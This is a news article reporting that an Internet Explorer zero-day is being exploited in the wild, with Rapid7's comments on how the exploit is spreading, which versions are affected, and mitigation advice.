IE zero-day actively being exploited in the wild: Rapid7

Criminals are actively abusing the zero-day vulnerability found in Internet Explorer, with exploit code now being found in the wild.
Written by Michael Lee, Contributor

Businesses running Internet Explorer should consider taking better precautions now that code to exploit a recently discovered zero-day vulnerability in the browser is making the rounds.

According to Rapid7 senior engineering manager Ross Barrett, exploit code is now being widely distributed on the web. He said that earlier this week, he saw exploit code submitted to Virus Total and Scumware.

Attackers typically exploit weaknesses in websites, for example, taking advantage of out-of-date WordPress implementations to upload their own content to servers. Then, through spam or phishing campaigns, herd unsuspecting users to these "drive-by" sites, which in turn exploit the users directly.

These sites eventually get reported to services like Virus Total and Scumware to help others identify them as malicious. But they also have the secondary effect of being good indicators of how well known a certain exploit is.

Barrett claims that with the high incidence of reports, the zero day is "about to become [as] severe as any browser issue can be".

He said that exploitation seems to only be limited to versions 8 and 9 of the browser, even though all versions at this point are vulnerable.

According to StatCounter, for the year thus far, Internet Explorer 8 and 9 represent 20.15 percent of all browsers. Including all versions of Internet Explorer puts its market share at 27.98 percent.

Barrett suggests that users simply not use Internet Explorer to avoid exposing themselves to unnecessary risk. For those that must, he said they should install all patches and upgrade to the latest version, even though he admits that neither action will do much to directly mitigate the vulnerability at this time.

The vulnerability was reported by Microsoft in mid September, but details on it only emerged earlier this week. It is alleged that attackers have already been using the vulnerability to target Japanese organisations.

Editorial standards